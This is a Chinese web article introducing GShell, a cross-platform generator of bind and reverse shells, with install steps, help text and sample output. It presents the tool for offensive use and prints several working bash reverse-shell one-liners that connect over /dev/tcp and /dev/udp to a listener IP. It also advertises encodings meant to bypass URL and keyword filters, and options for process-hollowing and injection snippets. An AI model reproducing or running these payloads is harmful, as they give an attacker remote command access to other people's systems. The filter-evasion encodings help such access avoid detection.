当前位置:首页 > 经验 >

shellcode生成器(shellcode使用教程)

来源:原点资讯(www.yd166.com)时间:2022-11-07 08:32:58作者:YD166手机阅读>>

shellcode生成器,shellcode使用教程(1)

关于GSHELL

GShell是一款功能强大且支持灵活扩展的跨平台Shell生成器,在该工具的帮助下,广大研究人员可以随意生成针对任意平台的任何Shell,并实现完全的自动化和管理控制功能。

支持的操作系统

类Unix系统

GNU/Linux

Windows

macOS

支持生成的Shell

Bind-Shel:目标需要有一个监听端口,然后我们连接到目标主机;

反向Shell:我们又一个监听端口,让目标连接到我们的设备;

支持的编码

URL编码:绕过URL过滤器;

Base64/32/16编码:绕过字符串/关键字过滤器;

PowerShell Base64编码;

支持的IP版本

IPv4

IPv6

支持的协议

TCP

UDP

ICMP

注意:你可以添加你自己使用了其他协议的Shell,比如说DNS。

支持的语言和工具

PowerShell

Python

bash

Sh

Perl

Socat

Netcat

Nc

Awk

Lua

NodeJS

OpenSSL

PHP

Ruby

Telnet

Golang

C#

Dart

Groovy

...

上述语言和工具不受任何限制,我们可以根据需要执行添加支持。

Shell相关的内容存储在Markdown文件中,支持随意修改。

我们可以通过向下列文件添加markdown代码块来增加更多的Bind Shell:

shells/bind_shells.md

你还可以通过向下列文件添加markdown代码块来增加更多的反向Shell:

shells/reverse_shells.md工具下载&安装Linux安装

广大研究人员可以通过下列命令将该项目源码克隆至本地:

git clone https://github.com/nozerobit/gshell.git

安装依赖组件:

python3 -m pIP install -r gshell/requirements.txt

将工具添加到$PATH环境变量中:

sudo ln -s $(pwd)/gshell/gshell.py /usr/local/bin/gshell.py && chmod x /usr/local/bin/gshell.py

执行工具:

gshell.pyWindows安装

通过下列命令将该项目源码克隆至本地:

git clone https://github.com/nozerobit/gshell C:\\Tools

以管理员权限运行命令行工具,并安装chocolatey:

@powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))" && SET PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin

在Windows中安装python 3:

choco install -y python3

安装pip:

python -m pip install --upgrade pip

安装依赖组件:

python -m pip install -r gshell/requirements.txt

切换到项目目录,并运行该工具:

cd C:\Tools python gshell.py工具使用

PS C:\gshell> python .\gshell.py -h usage: gshell.py [-i <IP ADDRESS>] [-p <PORT number>] [-s <SHELL TYPE>] [-r] [-b] [--hollowing] [--injector] [--base64] [--base32] [--base16] [--url] [--no-block] [-l] [-a] [-h] ██████ ███████ ██ ██ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███ ███████ ███████ █████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ██ ███████ ███████ ███████ Generate bind shells and/or reverse shells with style Version: 1.1 Author: nozerobit Twitter: @nozerobit Options: -i <IP ADDRESS>, --ip <IP ADDRESS> 指定IP地址 -p <PORT NUMBER>, --port <PORT NUMBER> 指定端口号 -s <SHELL TYPE>, --shell <SHELL TYPE> 指定Shell类型 (python, nc, bash等) Payload Types: -r, --reverse 反向Shell Payload -b, --bind Bind Shell Payload Snippets Types: --hollowing 打印进程镂空代码段 --injector 打印进程注入代码段 Encoding Options: --base64 添加Base64编码 --base32 添加Base32编码 --base16 添加Base16编码 --url 添加URL编码 Markdown Options: --no-block Skip ``` code blocks ``` while parsing Help Options: -l, --list 枚举所有可用的Shell类型 -a, --advice 打印使用建议和提示 -h, --help 显示帮助信息和退出工具使用样例生成Bash反向Shell

PS C:\gshell> python .\gshell.py -i 192.168.111.120 -p 443 -r -s bash [ ] The IPv4 address: 192.168.111.120 is valid. [ ] The port number: 443 is valid. [ ] Shell type is valid [ ] Preparing reverse shells [ ] Generating bash shells bash -i >& /dev/tcp/192.168.111.120/443 0>&1 ----------------NEXT CODE BLOCK---------------- 0<&196;exec 196<>/dev/tcp/192.168.111.120/443; sh <&196 >&196 2>&196 ----------------NEXT CODE BLOCK---------------- /bin/bash -l > /dev/tcp/192.168.111.120/443 0<&1 2>&1 ----------------NEXT CODE BLOCK---------------- bash -i >& /dev/tcp/192.168.111.120/443 0>&1 ----------------NEXT CODE BLOCK---------------- bash -i >& /dev/udp/192.168.111.120/443 0>&1编码样例

PS C:\gshell> python .\gshell.py -i 192.168.111.120 -p 443 -r -s bash --url [ ] The IPv4 address: 192.168.111.120 is valid. [ ] The port number: 443 is valid. [ ] Shell type is valid [ ] Preparing reverse shells [ ] Generating bash shells [ ] Adding URL Encoding bash -i >& /dev/tcp/192.168.111.120/443 0>&1 ----------------NEXT CODE BLOCK---------------- 0<&196;exec 196<>/dev/tcp/192.168.111.120/443; sh <&196 >&196 2>&196 ----------------NEXT CODE BLOCK---------------- /bin/bash -l > /dev/tcp/192.168.111.120/443 0<&1 2>&1 ----------------NEXT CODE BLOCK---------------- bash -i >& /dev/tcp/192.168.111.120/443 0>&1 ----------------NEXT CODE BLOCK---------------- bash -i >& /dev/udp/192.168.111.120/443 0>&1 ----------------NEXT CODE BLOCK----------------许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

GShell:https://github.com/nozerobit/gshell

栏目热文

静脉曲张的发病时间(静脉曲张锻炼最好方法)

静脉曲张的发病时间(静脉曲张锻炼最好方法)

静脉曲张是发病率非常高的一种血管病,在任何年龄段都可能会发病。统计数据显示,我国有10%—20%的成年男性,20%的成年...

2022-11-07 08:11:45查看全文 >>

造成全身静脉曲张的原因(全身静脉曲张怎么回事)

造成全身静脉曲张的原因(全身静脉曲张怎么回事)

关于腿上的浅静脉曲张的介绍文章,其实已经很多了,相信大家都已经看过了。对这个疾病有了一定的了解,但是发现大家都有一个疑问...

2022-11-07 08:26:24查看全文 >>

轻度静脉曲张怎么治疗(静脉曲张最怕三种食物)

轻度静脉曲张怎么治疗(静脉曲张最怕三种食物)

下肢静脉曲张俗称“炸筋腿”,是静脉系统最常见的一种疾病,形成的主要原因是由于先天性血管壁膜比较薄弱或长时间维持相同姿势...

2022-11-07 08:36:30查看全文 >>

女性静脉曲张的7大前兆(静脉曲张六个阶段图片)

女性静脉曲张的7大前兆(静脉曲张六个阶段图片)

其实不光光是人会按照性别而分为男和女的,疾病同样会因为性别而分为男性容易患上的疾病和女性容易患上的疾病,这一点也是有一点...

2022-11-07 08:09:30查看全文 >>

静脉曲张的十大危害(静脉曲张能自己恢复吗)

静脉曲张的十大危害(静脉曲张能自己恢复吗)

静脉曲张是现在非常常见的一种血管方面的疾病,该病的出现给我们的下肢健康造成了不同程度的危害,该病初期症状相对轻微,但是随...

2022-11-07 08:31:32查看全文 >>

shellcode执行原理(shellcode安装)

shellcode执行原理(shellcode安装)

缓冲区溢出属于非常有名的漏洞之一,其大体含义为:缓冲区溢出是超出程序内存设定范围,数据溢出后程序发生异常,黑客可以利用缓...

2022-11-07 08:22:14查看全文 >>

shellcode编码(shellcode代码)

shellcode编码(shellcode代码)

前言在做红蓝攻防时,常常要用到cs、msf等工具,使用工具生成shellcode或可执行程序,那么小小的shellcod...

2022-11-07 08:22:18查看全文 >>

shellcode生成可执行文件(shell脚本怎么变成可执行文件)

shellcode生成可执行文件(shell脚本怎么变成可执行文件)

原创: EDI-VOID 合天智汇0x00 shellcode编写首先shellcode的编写可以用纯汇编也可以用c ...

2022-11-07 08:36:40查看全文 >>

shellcode到底是啥(shellcode使用教程)

shellcode到底是啥(shellcode使用教程)

零基础学黑客领资料搜公众号:白帽子左一因前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅...

2022-11-07 08:17:00查看全文 >>

shellcode执行方式(shell脚本的执行方法)

shellcode执行方式(shell脚本的执行方法)

本篇主要是以x64系统为例对系统调用中一些功能性函数的解读和实际运用。目前网络上流传的通用shellcode,均使用系统...

2022-11-07 08:13:07查看全文 >>

文档排行